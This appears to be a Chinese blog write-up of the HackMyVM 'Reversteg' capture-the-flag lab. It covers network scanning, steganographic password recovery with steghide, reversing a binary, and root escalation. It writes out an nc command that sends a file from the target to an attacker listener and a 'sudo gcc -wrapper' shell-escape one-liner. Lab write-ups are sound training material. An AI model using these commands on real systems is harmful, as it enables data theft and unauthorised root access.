当前位置: 首页 > news >正文

hackmyvm-reversteg

arp-scan -l

nmap -sS -v 192.168.222.45

在源码中可以看到

根据下面的提示可以猜测117db0148dc179a2c2245c5a30e63ab0是一个图像文件

将图片下载到本地

隐写术

在两张图片上使用strings,发现有一些可打印的字符串

strings 117db0148dc179a2c2245c5a30e63ab0.jpg

base64解码

zsteg也可以提取一些关于 PNG 图像的隐藏信息

zsteg 117db0148dc179a2c2245c5a30e63ab0.png

提取png隐藏信息的工具:zsteg、exiftool、binwalk、foremost

提取jpg隐藏信息的工具:strings、steghide

使用 steghide 提取更多信息的密码是“morainelake”

steghide extract -sf 117db0148dc179a2c2245c5a30e63ab0.jpg -p "morainelake"

连接ssh

secret.zip的密码是morainelake

cat history > a

cat history > b

grep -f a b

history可能被写入到定时任务中,每次查看都会更改,真的flag不变

grep -f a b 是一个在 Unix/Linux 系统中常用的命令,用于从文件 b 中筛选出与文件 a 中的模式匹配的行。

将reverse文件发送到本地
nc -lp 1234 > rev2
nc 192.168.222.149 < reverse

分析reverse

将reverse拖进ida,调试,找到密码

运行reverse,输入密码,运行成功

cat tmp |tr -d '\n'

ll104567bamuweta0eviden即为密码

总共有两个用户,尝试登录到welcome

切换用户
su - welcome

提权

sudo -l

sudo /usr/bin/gcc -wrapper /opt/../../../bin/bash,-s .

参考:

hackmyvm medium Reversteg靶场复盘_哔哩哔哩_bilibili

https://nutzh.top/hackmyvm/reversteg/?i=1

gcc | GTFOBins

 

相关文章:

  • Modbus TCP返回报文
  • 简单介绍一下Unity中的ScriptableObject
  • Skynet 框架中 gateserver、gate、watchdog 的关系
  • browser-use 库网页元素点击测试工具
  • 多路转接epoll
  • 基于杜鹃鸟鲶鱼优化(Cuckoo Catfish Optimizer,CCO)算法的多个无人机协同路径规划(可以自定义无人机数量及起始点),MATLAB代码
  • 输入百分比校验(数字非负数保留2位不四舍五入)
  • ABAQUS圆柱体纤维重力堆积3D模型
  • 关于bug总结记录
  • 软件测试之fiddler详解
  • 计算机二级(C语言)考试高频考点总汇(二)—— 控制流、函数、数组和指针
  • 破解AI焦虑,YonSuite给出了一份企业AI落地路线图
  • 学习日记0327
  • 基于FPGA的ESP8266无线数据传输(温湿度DTH11、光照强度BH1750、WIFI模块)连接中国移动onenet云平台,仿真+上板
  • 数据大屏点亮工业互联网的智慧之眼
  • 材料科学基础:空间群与点群(2)
  • Redis6为什么引入了多线程?
  • TDengine 中的保留关键词
  • 利用新一代雷达传感器增强ADAS系统的检测和计算(TI文档)
  • 深入浅出Qt属性系统:原理、使用与实践
  • 品牌商城网站开发/如何查看网站权重
  • 天翼云电脑免费领取/免费的关键词优化工具
  • 中国做网站找谁/seo推广和百度推广的区别
  • 汕头正规网站建设模板总部/营销推广有哪些形式
  • 品牌高端网站制作企业/seo查询平台
  • 团委网站开发/seo排名优化软件免费